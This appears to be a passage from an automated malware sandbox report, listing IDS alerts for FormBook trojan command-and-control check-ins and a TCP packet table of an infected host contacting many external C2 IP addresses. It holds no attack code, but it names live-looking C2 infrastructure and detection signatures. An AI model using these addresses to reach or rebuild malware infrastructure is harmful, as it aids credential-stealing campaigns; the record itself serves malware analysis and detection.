                                          07/04/24-16:55:29.149800TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.7194.58.112.174
                                          07/04/24-16:54:59.779589TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.7213.145.228.16
                                          07/04/24-16:52:54.789097TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34970680192.168.2.7217.160.0.106
                                          07/04/24-16:53:22.021315TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971280192.168.2.7208.91.197.27
                                          07/04/24-16:54:48.852255TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972980192.168.2.7199.192.19.19
                                          07/04/24-16:55:26.621590TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.7194.58.112.174
                                          07/04/24-16:55:02.327495TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.7213.145.228.16
                                          07/04/24-16:55:13.231476TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.791.195.240.19
                                          07/04/24-16:53:58.144607TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.7194.9.94.85
                                          07/04/24-16:54:12.061387TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.723.251.54.212
                                          07/04/24-16:55:42.557594TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.7172.67.210.102
                                          07/04/24-16:53:44.361554TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.743.252.167.188
                                          07/04/24-16:55:15.777514TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.791.195.240.19
                                          07/04/24-16:54:46.311846TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.7199.192.19.19
                                          07/04/24-16:54:00.682084TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.7194.9.94.85
                                          07/04/24-16:53:46.900097TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.743.252.167.188
                                          07/04/24-16:52:52.254180TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34970580192.168.2.7217.160.0.106
                                          07/04/24-16:54:14.588408TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972580192.168.2.723.251.54.212
                                          07/04/24-16:55:40.027987TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.7172.67.210.102

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 4, 2024 16:52:36.465002060 CEST4970480192.168.2.75.44.111.162
                                          Jul 4, 2024 16:52:36.471350908 CEST80497045.44.111.162192.168.2.7
                                          Jul 4, 2024 16:52:36.471462011 CEST4970480192.168.2.75.44.111.162
                                          Jul 4, 2024 16:52:36.477865934 CEST4970480192.168.2.75.44.111.162
                                          Jul 4, 2024 16:52:36.483901024 CEST80497045.44.111.162192.168.2.7
                                          Jul 4, 2024 16:52:37.133348942 CEST80497045.44.111.162192.168.2.7
                                          Jul 4, 2024 16:52:37.133367062 CEST80497045.44.111.162192.168.2.7
                                          Jul 4, 2024 16:52:37.133616924 CEST4970480192.168.2.75.44.111.162
                                          Jul 4, 2024 16:52:37.136322021 CEST4970480192.168.2.75.44.111.162
                                          Jul 4, 2024 16:52:37.141473055 CEST80497045.44.111.162192.168.2.7
                                          Jul 4, 2024 16:52:52.244966984 CEST4970580192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:52.252361059 CEST8049705217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:52.252446890 CEST4970580192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:52.254179955 CEST4970580192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:52.259499073 CEST8049705217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:52.932354927 CEST8049705217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:52.932467937 CEST8049705217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:52.932554007 CEST4970580192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:53.762443066 CEST4970580192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:54.781671047 CEST4970680192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:54.786855936 CEST8049706217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:54.786973953 CEST4970680192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:54.789097071 CEST4970680192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:54.793920994 CEST8049706217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:55.473630905 CEST8049706217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:55.473764896 CEST8049706217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:55.473851919 CEST4970680192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:56.293751001 CEST4970680192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:57.313131094 CEST4970780192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:57.318068027 CEST8049707217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:57.318306923 CEST4970780192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:57.320303917 CEST4970780192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:57.325167894 CEST8049707217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:57.325217962 CEST8049707217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:58.071453094 CEST8049707217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:58.071587086 CEST8049707217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:58.071641922 CEST4970780192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:58.824764967 CEST4970780192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:59.846560955 CEST4970880192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:59.854441881 CEST8049708217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:52:59.854515076 CEST4970880192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:59.856486082 CEST4970880192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:52:59.861231089 CEST8049708217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:53:00.517497063 CEST8049708217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:53:00.531868935 CEST8049708217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:53:00.531964064 CEST4970880192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:53:00.532752037 CEST4970880192.168.2.7217.160.0.106
                                          Jul 4, 2024 16:53:00.537544012 CEST8049708217.160.0.106192.168.2.7
                                          Jul 4, 2024 16:53:22.013622999 CEST4971280192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:22.019160986 CEST8049712208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:22.019243002 CEST4971280192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:22.021315098 CEST4971280192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:22.026168108 CEST8049712208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:22.491641045 CEST8049712208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:22.491702080 CEST4971280192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:23.528386116 CEST4971280192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:23.534238100 CEST8049712208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:24.546407938 CEST4971380192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:24.551314116 CEST8049713208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:24.551455975 CEST4971380192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:24.553352118 CEST4971380192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:24.558173895 CEST8049713208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:25.049664021 CEST8049713208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:25.049922943 CEST4971380192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:26.059432030 CEST4971380192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:26.064424992 CEST8049713208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:27.079040051 CEST4971480192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:27.083997965 CEST8049714208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:27.084135056 CEST4971480192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:27.088635921 CEST4971480192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:27.093753099 CEST8049714208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:27.094259024 CEST8049714208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:27.575026989 CEST8049714208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:27.575084925 CEST4971480192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:28.590739965 CEST4971480192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:28.595709085 CEST8049714208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:29.609603882 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:29.614631891 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:29.614717960 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:29.616545916 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:29.621470928 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541063070 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541084051 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541098118 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541125059 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541136026 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541141033 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541145086 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541151047 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541239023 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.541380882 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.541419983 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541433096 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.541490078 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.546256065 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.546293020 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.546305895 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.546488047 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.629441023 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629461050 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629478931 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629489899 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629501104 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629627943 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.629760981 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629798889 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.629827023 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629837990 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629869938 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.629965067 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.629975080 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630019903 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.630587101 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630664110 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630673885 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630713940 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.630913019 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630923033 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.630949974 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.631442070 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.631491899 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.631504059 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.631513119 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.631550074 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.632945061 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.633065939 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.633088112 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.633099079 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.633111000 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.633110046 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.633128881 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.634509087 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.634547949 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.634553909 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.634565115 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:30.634599924 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.638286114 CEST4971580192.168.2.7208.91.197.27
                                          Jul 4, 2024 16:53:30.643855095 CEST8049715208.91.197.27192.168.2.7
                                          Jul 4, 2024 16:53:44.354590893 CEST4971680192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:44.359443903 CEST804971643.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:44.359596968 CEST4971680192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:44.361553907 CEST4971680192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:44.366379976 CEST804971643.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:45.284420013 CEST804971643.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:45.284442902 CEST804971643.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:45.284523964 CEST4971680192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:45.872037888 CEST4971680192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:46.892322063 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:46.897401094 CEST804971743.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:46.897479057 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:46.900096893 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:46.904877901 CEST804971743.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:47.793884993 CEST804971743.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:47.794096947 CEST804971743.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:47.794209957 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:48.428813934 CEST4971780192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.442385912 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.447803974 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:49.447890997 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.450368881 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:49.456132889 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:49.456271887 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636241913 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636265039 CEST804971843.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:50.636317968 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:50.965754032 CEST4971880192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.984478951 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.989646912 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:51.991595030 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:51.995414972 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:52.001710892 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.998866081 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.999054909 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:52.999113083 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:53.002871037 CEST4971980192.168.2.743.252.167.188
                                          Jul 4, 2024 16:53:53.007900000 CEST804971943.252.167.188192.168.2.7
                                          Jul 4, 2024 16:53:58.137664080 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.142551899 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.142697096 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.144607067 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.150125027 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815129995 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815161943 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815172911 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815186024 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815197945 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815210104 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815232992 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815334082 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815340042 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815340042 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:58.815346003 CEST8049720194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:53:58.815402031 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:53:59.653225899 CEST4972080192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.674647093 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.679639101 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:00.679709911 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.682084084 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:00.686872005 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344336987 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344357014 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344368935 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344461918 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344465017 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344474077 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344489098 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344507933 CEST8049721194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:01.344511986 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344540119 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:01.344615936 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:02.184408903 CEST4972180192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.210362911 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.215398073 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.215548038 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.217961073 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.223885059 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.223900080 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888307095 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888339043 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888351917 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888365030 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888379097 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888441086 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888451099 CEST8049722194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:03.888499022 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.888499022 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:03.888559103 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:04.731409073 CEST4972280192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.751576900 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.756495953 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:05.761291981 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.761291981 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:05.766089916 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432868004 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432897091 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432912111 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432948112 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432966948 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.432981968 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:06.433087111 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.433087111 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.441382885 CEST4972380192.168.2.7194.9.94.85
                                          Jul 4, 2024 16:54:06.446306944 CEST8049723194.9.94.85192.168.2.7
                                          Jul 4, 2024 16:54:12.050554037 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:12.055496931 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:12.055634022 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:12.061387062 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:12.069638968 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:13.559658051 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:13.612584114 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:14.578212023 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.583165884 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:14.585510969 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.588407993 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.593305111 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:16.090781927 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:16.136610031 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.112859011 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.118185043 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.118263006 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.121809959 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.126888990 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.128057003 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:18.637639999 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:18.688657999 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:19.657409906 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.662358999 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:19.667346954 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.667346954 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.672120094 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:33.457432032 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:33.457488060 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:35.977018118 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:35.981558084 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:38.477833986 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:38.477932930 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.260768890 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:41.260879040 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.261785030 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.266556978 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:46.305454969 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.310244083 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.310355902 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.311846018 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.316603899 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924302101 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924325943 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924335003 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924370050 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924423933 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924436092 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924459934 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924547911 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924587965 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924598932 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924608946 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924618959 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924657106 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924734116 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924771070 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.929291010 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929364920 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929377079 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929413080 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.929486990 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929524899 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.014365911 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014384031 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014424086 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.014523029 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014563084 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.827960014 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.844795942 CEST4972980192.168.2.7199.192.19.19
